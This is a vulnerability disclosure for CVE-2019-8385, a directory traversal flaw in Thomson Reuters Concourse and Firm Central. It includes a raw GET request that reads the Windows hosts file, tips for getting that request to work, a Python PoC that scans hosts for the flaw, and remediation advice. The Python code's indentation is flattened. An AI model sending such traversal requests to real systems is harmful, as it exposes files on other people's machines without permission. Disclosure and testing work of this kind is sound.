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Thomson Reuters Concourse And Firm Central Local File Inclusion / Directory Traversal

🗓️ 29 Mar 2019 00:00:00Reported by 0v3rrideType 
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Thomson Reuters Concourse & Firm Central has a Directory Traversal & Local File Inclusion vulnerability due to improper handling of get requests in some versions. Exploitable by modifying GET requests in Port Swigger's Burp suite tool. Listening on default port 6677 or sometimes on ports 7000, 7001, or 7002. The python script can be used to check for the error message response. Solution involves downloading the latest version and stopping the Thomson Reuters Desktop Extensions service

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Thomson Reuters Concourse & Firm Central 2.13.0097 Directory Traversal / Local File Inclusion
28 Mar 201900:00
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CVE-2019-8385
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CVE-2019-8385
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CVE-2019-8385
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CVE-2019-8385
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`# Exploit Title: Thomson Reuters Concourse & Firm Central < 2.13.0097 - Directory Traversal & Local File Inclusion  
# Date: 02/13/2019   
# Exploit Author: 0v3rride  
# Vendor Homepage: https://www.thomsonreuters.com/en.html  
# Software Link: Firm Central (http://info.legalsolutions.thomsonreuters.com/software/firm-central/default.aspx) & Concourse (http://info.legalsolutions.thomsonreuters.com/software/concourse-matter-room/)   
# Version: (< 2.13.0097 - Thomson Reuters Concourse & Firm Central) (ThomsonReuters.Desktop.Service.exe v1.9.0.358)  
# Affected Component: ThomsonReuters.Desktop.Service.exe and/or ThomsonReuters.Desktop.exe v1.9.0.358  
# Tested on: Windows  
# CVE: 2019-8385  
  
Summary:  
The ThomsonReuters.Desktop.Service.exe or ThomsonReuters.Desktop.exe does not properly handle a modified get request. All version prior to 2.13.0097 of Thomson Reuters Concourse and Firm Central utilize this component, thus they are affected after working with and speaking with the information security team at Thomson Reuters. By default the service listens on 6677, but is sometimes may be listening on ports 7000, 7001 or 7002.  
  
Exploitation:  
Currently, this vulnerability is only exploitable by modifying the  
request in the repeater module of Port Swigger's Burp suite tool. The  
affected component usually on port 6677 by default.  
  
E.g. GET request in burp suite  
  
GET \..\..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts HTTP/1.1  
Host: host.domain.tld:6677  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: _ga=GA1.2.1239644041.1549987630; _gid=GA1.2.1694605918.1549987630  
Upgrade-Insecure-Requests: 1  
  
Additionally, the file path cannot end with  
a backslash (\). You will be presented with following error if so -  
<h1>Page Not Found</h1>Sorry, we couldn't find what you were looking  
for . A sequence of at least five slash-dot-dots (\..) are needed. Furthermore, if you use the intruder module in Burp to automate the process, make sure that the payloads are not being encoded into any format (url encode, b64 encode, etc.) as this will mangle the request and you won't get a response.  
  
The python script checks for the error message by sending a request and looking for the error specified in the response. You can easily do this yourself by simply navigating to the FQDN or IP of the host on port 6677 or other port to see if you get the error in your web browser.  
  
Solution:  
  
Download the latest version  
Stop the Thomson Reuters Desktop Extensions service and set the startup type value to disabled using powershell, services.msc, etc.  
'''  
  
#!/usr/bin/env python  
  
#######################  
# PoC by: 0v3rride #  
# DoC: March 2019 #  
#######################  
  
from argparse import *;  
from requests import *;  
  
def parseArgs():  
parser = ArgumentParser();  
parser.add_argument("-host", required=True, type=str, help="IP address or FQDN of the host to check");  
parser.add_argument("-verbose", required=False, action="store_true", default=False, help="Returns a detailed response from the get request");  
parser.add_argument("-tls", required=False, action="store_true", default=False, help="Use this flag is the target host is using https");  
parser.add_argument("-port", required=False, type=int, default=6677, help="By default the Thomson Reuters Desktop Service listens on port 6677, but I've also seen it listen on ports 7000-7002");  
  
return parser.parse_args();  
  
def check(cargs):  
args = cargs  
greq = None;  
  
try:  
if args.tls:  
greq = get("{}{}:{}".format("https://", args.host, args.port));  
elif not args.tls:  
greq = get("{}{}:{}".format("http://", args.host, args.port));  
else:  
greq = get("{}{}:{}".format("http://", args.host, args.port));  
  
if args.verbose:  
print("{}:{}".format("Detailed Response", "-"*58));  
for hdr in greq.headers.keys():  
print("{}: {}".format(hdr, greq.headers[hdr]));  
  
print("\n{}:{}".format("Vulnerability Information", "-"*50));  
  
if greq.text.find("<h1>Page Not Found</h1>Sorry, we couldn't find what you were looking for ") > -1:  
print("[!!!]: The target appears to be VULNERABLE to directory traversal!\n");  
print("[i]: Use the following GET request value with the repeater tool in Burp Suite to confirm: \\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\Drivers\\etc\\hosts\n");  
print("[i]: Make sure the paths you are traversing to don't end with a backslash '\\', otherwise it will not work. You'll know when this happens via an error message in the response.\n");  
print("[i]: If you decide to run the request with the intruder tool in Brup Suite, then make sure Brup doesn't encode the payloads as this will not make it work either.\n");  
else:  
print("[i]: The target DOES NOT appear to be vulnerable to directory traversal. However, there is a chance that the error message was disabled, etc.\n")  
print("[i]: You may to try the following GET request value with the repeater tool in Burp Suite to confirm: \\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\Drivers\\etc\\hosts\n");  
print("[i]: Make sure the paths you are traversing to don't end with a backslash '\\'.\n");  
print("[i]: If you decide to run the request with the intruder tool in Brup Suite, then make sure Brup doesn't encode the payloads as this will not make it work either.\n");  
except:  
print("[i]: A connection to the target could not be made!\n");  
print("[i]: The target may not be vulnerable to directory traversal. Check your information regarding the target and arguments then try again.\n");  
  
  
def main():  
print(r"""  
______ _______ ____ ___ _ ___ ___ _____ ___ ____  
/ ___\ \ / / ____| |___ \ / _ \/ |/ _ \ ( _ )___ / ( _ ) ___|  
| | \ \ / /| _| _____ __) | | | | | (_) |_____ / _ \ |_ \ / _ \___ \  
| |___ \ / | |__|_____/ __/| |_| | |\__, |_____| (_) |__) | (_) |__) |  
\____| \_/ |_____| |_____|\___/|_| /_/ \___/____/ \___/____/  
[*] https://github.com/0v3rride  
[*] Script has started...  
[*] Use CTRL+C to cancel the script at anytime.  
  
[!]: This script checks to see if the target appears vulnerable, but does not guarantee it! It does not exploit the vulnerability either!  
[!]: You might need to use the dos2unix tool for conversion and functionality purposes on a Linux box!  
""");  
  
check(parseArgs());  
#print(get("http://10.12.8.2:6677").text);  
print("[!]: Done!");  
  
#Begin  
main();  
`

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